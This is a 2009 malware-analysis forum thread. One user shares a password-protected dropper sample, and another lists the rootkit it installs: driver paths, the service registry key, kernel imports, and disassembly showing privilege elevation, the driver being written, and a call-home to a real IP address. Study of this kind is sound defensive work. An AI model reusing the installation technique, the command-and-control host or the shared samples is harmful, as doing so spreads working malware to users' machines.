Something Advanced

[hypa]

I've already took apart the dropper, but I just want to see if anyone here can unpack what it drops. I wont say anything else, interested in feedback.

zip pass = infected

GodLike.zip

Edited September 26, 2009 by hiya

[STRELiTZIA]

The malware install and load rootkit in the following paths:

[Paths]

\\127.0.0.1\admin$\system32\drivers\Random_Name.sys

X:\WINDOWS\system32\drivers\Random_Name.sys

[Rootkit registry key]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Random_Name.sys]

"Type"=dword:00000001

"Start"=dword:00000001

"ErrorControl"=dword:00000000

"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,\

44,00,4f,00,57,00,53,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\

00,5c,00,64,00,72,00,69,00,76,00,65,00,72,00,73,00,5c,00,63,00,32,00,66,00,\

35,00,65,00,64,00,32,00,65,00,2e,00,73,00,79,00,73,00,00,00

"DisplayName"="Random_Name.sys"

ImagePath : \??\C:\WINDOWS\system32\drivers\c2f5ed2e.sys

ImagePath : 5c3f3f5c433a5c57494e444f57535c73797374656d33325c647269766572735c63326635656432652e737973

Kernel mode Thread Created : Random_Name.sys[.text]

[Rootkit Imports]

DbgPrint

IoAttachDevice

ExRaiseAccessViolation

IofCallDriver

KePulseEvent

NtQueryInformationFile

NtCreateFile

ExAllocatePoolWithQuota

ZwClose

IoDeleteDevice

ExRaiseException

IoFreeIrp

NtOpenProcess

KeNumberProcessors

h t t p://81.29.242.20/test/err.php?err=%srsc33CDF2DA

[c2f5ed2e.sys] Rootkit attached with password : infected

------------

004010A6 BE 59154000 MOV ESI,xyyy.00401559

004010AB BF CC7B4000 MOV EDI,xyyy.00407BCC

004010B0 AD LODS DWORD PTR DS:[ESI]

004010B1 85C0 TEST EAX,EAX

004010B3 74 17 JE SHORT xyyy.004010CC

004010B5 50 PUSH EAX

004010B6 FF15 46104000 CALL DWORD PTR DS:[<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA

004010BC 56 PUSH ESI

004010BD 50 PUSH EAX

004010BE FF15 42104000 CALL DWORD PTR DS:[<&kernel32.GetProcAddress>] ; kernel32.GetProcAddress

004010C4 AB STOS DWORD PTR ES:[EDI]

004010C5 AC LODS BYTE PTR DS:[ESI]

004010C6 84C0 TEST AL,AL

004010C8 ^ 75 FB JNZ SHORT xyyy.004010C5

004010CA ^ EB E4 JMP SHORT xyyy.004010B0

004010CC BE 09154000 MOV ESI,xyyy.00401509 ; ASCII "rsc33CDF2DA"

004010D1 56 PUSH ESI

004010D2 FF15 0C7C4000 CALL DWORD PTR DS:[407C0C] ; kernel32.GlobalFindAtomA

004010D8 66:85C0 TEST AX,AX

004010DB 0F85 62010000 JNZ xyyy.00401243

004010E1 56 PUSH ESI

004010E2 FF15 107C4000 CALL DWORD PTR DS:[407C10] ; kernel32.GlobalAddAtomA

004010E8 FF15 CC7B4000 CALL DWORD PTR DS:[407BCC] ; kernel32.GetVersion

004010EE 3C 05 CMP AL,5

004010F0 0F82 0C010000 JB xyyy.00401202

004010F6 50 PUSH EAX

004010F7 E8 EF010000 CALL xyyy.004012EB

004010FC 85C0 TEST EAX,EAX

004010FE 75 60 JNZ SHORT xyyy.00401160

00401100 58 POP EAX

00401101 3C 06 CMP AL,6

00401103 0F82 00010000 JB xyyy.00401209

00401109 6A 00 PUSH 0

0040110B 6A 00 PUSH 0

0040110D 6A 00 PUSH 0

0040110F 68 C5124000 PUSH xyyy.004012C5

00401114 6A 00 PUSH 0

00401116 6A 00 PUSH 0

00401118 FF15 E07B4000 CALL DWORD PTR DS:[407BE0] ; kernel32.CreateThread

0040111E BE F87A4000 MOV ESI,xyyy.00407AF8

00401123 68 00010000 PUSH 100

00401128 56 PUSH ESI

00401129 6A 00 PUSH 0

0040112B FF15 D87B4000 CALL DWORD PTR DS:[407BD8] ; kernel32.GetModuleFileNameA

00401131 C70406 22000000 MOV DWORD PTR DS:[ESI+EAX],22

00401138 6A 00 PUSH 0

0040113A 6A 00 PUSH 0

0040113C 68 F47A4000 PUSH xyyy.00407AF4 ; ASCII "/c """

00401141 68 DA144000 PUSH xyyy.004014DA ; ASCII "cmd.exe"

00401146 68 D4144000 PUSH xyyy.004014D4 ; ASCII "runas"

0040114B 6A 00 PUSH 0

0040114D FF15 D47B4000 CALL DWORD PTR DS:[407BD4] ; shell32.ShellExecuteA

00401153 83F8 20 CMP EAX,20

00401156 ^ 72 E0 JB SHORT xyyy.00401138

00401158 6A 00 PUSH 0

0040115A FF15 D07B4000 CALL DWORD PTR DS:[407BD0] ; kernel32.ExitProcess

00401160 0F31 RDTSC

00401162 89C5 MOV EBP,EAX

00401164 C1C5 10 ROL EBP,10

00401167 31D5 XOR EBP,EDX

00401169 6A 50 PUSH 50

0040116B 68 F87A4000 PUSH xyyy.00407AF8

00401170 FF15 F87B4000 CALL DWORD PTR DS:[407BF8] ; kernel32.GetSystemDirectoryA

00401176 55 PUSH EBP

00401177 68 F87A4000 PUSH xyyy.00407AF8

0040117C 68 BF144000 PUSH xyyy.004014BF ; ASCII "%s\drivers\%0.8x.sys"

00401181 68 487B4000 PUSH xyyy.00407B48

00401186 FF15 E87B4000 CALL DWORD PTR DS:[407BE8] ; USER32.wsprintfA

0040118C BE F87A4000 MOV ESI,xyyy.00407AF8

00401191 55 PUSH EBP

00401192 68 91144000 PUSH xyyy.00401491 ; ASCII "\\127.0.0.1\admin$\system32\drivers\%0.8x.sys"

00401197 56 PUSH ESI

00401198 FF15 E87B4000 CALL DWORD PTR DS:[407BE8] ; USER32.wsprintfA

0040119E 83C4 0C ADD ESP,0C

004011A1 6A 00 PUSH 0

004011A3 6A 00 PUSH 0

004011A5 6A 02 PUSH 2

004011A7 6A 00 PUSH 0

004011A9 6A 00 PUSH 0

004011AB 68 00000040 PUSH 40000000

004011B0 56 PUSH ESI

004011B1 FF15 EC7B4000 CALL DWORD PTR DS:[407BEC] ; kernel32.CreateFileA

004011B7 83F8 FF CMP EAX,-1

004011BA 75 1F JNZ SHORT xyyy.004011DB

004011BC 6A 00 PUSH 0

004011BE 6A 00 PUSH 0

004011C0 6A 02 PUSH 2

004011C2 6A 00 PUSH 0

004011C4 6A 00 PUSH 0

004011C6 68 00000040 PUSH 40000000

004011CB 68 487B4000 PUSH xyyy.00407B48

004011D0 FF15 EC7B4000 CALL DWORD PTR DS:[407BEC] ; kernel32.CreateFileA

004011D6 83F8 FF CMP EAX,-1

004011D9 74 35 JE SHORT xyyy.00401210

004011DB 89C6 MOV ESI,EAX

004011DD 68 00640000 PUSH 6400

004011E2 68 F4164000 PUSH xyyy.004016F4

004011E7 56 PUSH ESI

004011E8 FF15 F07B4000 CALL DWORD PTR DS:[407BF0] ; kernel32._lwrite

004011EE 56 PUSH ESI

004011EF FF15 F47B4000 CALL DWORD PTR DS:[407BF4] ; kernel32._lclose

004011F5 E8 3E010000 CALL xyyy.00401338

004011FA 85C0 TEST EAX,EAX

004011FC 74 19 JE SHORT xyyy.00401217

004011FE 31F6 XOR ESI,ESI

00401200 EB 1A JMP SHORT xyyy.0040121C

00401202 BE 3C144000 MOV ESI,xyyy.0040143C ; ASCII "invalid_os_version"

00401207 EB 13 JMP SHORT xyyy.0040121C

00401209 BE 4F144000 MOV ESI,xyyy.0040144F ; ASCII "not_enought_privilegies"

0040120E EB 0C JMP SHORT xyyy.0040121C

00401210 BE 67144000 MOV ESI,xyyy.00401467 ; ASCII "create_driver_file_fail"

00401215 EB 05 JMP SHORT xyyy.0040121C

00401217 BE 7F144000 MOV ESI,xyyy.0040147F ; ASCII "load_driver_error"

0040121C 85F6 TEST ESI,ESI

0040121E 74 23 JE SHORT xyyy.00401243

00401220 BF F87A4000 MOV EDI,xyyy.00407AF8

00401225 56 PUSH ESI

00401226 68 E2144000 PUSH xyyy.004014E2 ; ASCII &quot;http://81.29.242.20/test/err.php?err=%srsc33CDF2DA"

0040122B 57 PUSH EDI

0040122C FF15 E87B4000 CALL DWORD PTR DS:[407BE8] ; USER32.wsprintfA

00401232 83C4 0C ADD ESP,0C

00401235 6A 00 PUSH 0

00401237 6A 00 PUSH 0

00401239 57 PUSH EDI

0040123A 57 PUSH EDI

0040123B 6A 00 PUSH 0

0040123D FF15 087C4000 CALL DWORD PTR DS:[407C08] ; urlmon.URLDownloadToFileA

00401243 6A 00 PUSH 0

00401245 FF15 D07B4000 CALL DWORD PTR DS:[407BD0] ; kernel32.ExitProcess

------------

Rootkit.rar

Edited September 28, 2009 by STRELiTZIA

[hypa]

Yeah it was suppose to be the Rustock.c dropper. Someone said the driver has a really advanced mutation. Doesn't look like the right rootkit.

Edited October 7, 2009 by hiya